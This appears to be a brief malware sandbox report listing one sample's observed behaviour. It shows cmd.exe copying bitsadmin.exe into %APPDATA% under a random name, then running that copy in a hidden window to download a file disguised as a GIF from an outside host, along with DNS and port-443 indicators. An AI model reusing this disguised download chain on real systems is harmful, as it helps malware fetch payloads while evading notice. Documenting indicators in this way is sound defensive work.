Technical Information
- '%APPDATA%\xalwg.exe' /transfer dLSjpw /download https://tffcoop.com/robo/01729810547/1x1.gif %APPDATA%\1x1.gif
- %APPDATA%\xalwg.exe
- 'tf##oop.com':443
- DNS ASK tf##oop.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\XALWg.exe' (with hidden window)
- '%APPDATA%\xalwg.exe' /transfer dLSjpw /download https://tffcoop.com/robo/01729810547/1x1.gif %APPDATA%\1x1.gif' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\XALWg.exe